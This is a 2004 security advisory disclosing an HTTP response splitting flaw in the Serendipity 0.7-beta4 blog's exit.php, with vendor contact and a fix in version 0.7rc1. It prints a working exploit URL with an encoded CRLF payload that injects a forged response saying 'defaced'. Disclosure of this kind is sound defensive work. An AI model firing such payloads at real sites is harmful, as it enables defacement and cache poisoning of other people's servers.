HTTP Response Splitting in Serendipity 0.7-beta4
SECURITY ADVISORY: HTTP Response Splitting in
Serendipity 0.7-beta4
AUTHOR: Chaotic Evil (chaoticevil $$$at$$$ spyring
$$$dot$$$ com)
DATE: October 21st, 2004
PRODUCT: Serendipity 0.7-beta4 [October 14th, 2004
(Recommended release, most stable)] - www.s9y.org
FROM THE VENDOR WEBSITE:
Serendipity is a weblog/blog system, implemented with
PHP. It is standards compliant, feature rich and open
source (BSD License).
SECURITY VULNERABILITY
HTTP Response Splitting [1].
EXPLOIT:
(observe that the url parameter is Base64-encoded, then
URL-encoded)
http://SERVER/serendipity/exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb
250ZW50LUxlbmd0aDogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbnQtTGVuZ3RoOiAyMQ0KQ
29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9odG1sPg%3d%3d
VENDOR STATUS: Vendor contacted October 14th. Vendor
worked closely with the author and promptly produced a
fix (see below).
FIX: Use version 0.7rc1 (downloadable at
http://www.s9y.org/12.html)
REFERENCES:
[1] "'Divide and Conquer' - HTTP Response Splitting, Web
Cache Poisoning attacks, and Related Topics" by Amit
Klein, dated March 4th, 2004
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pd
f
_____________________________________________
Free email with personality! Over 200 domains!
http://www.MyOwnEmail.com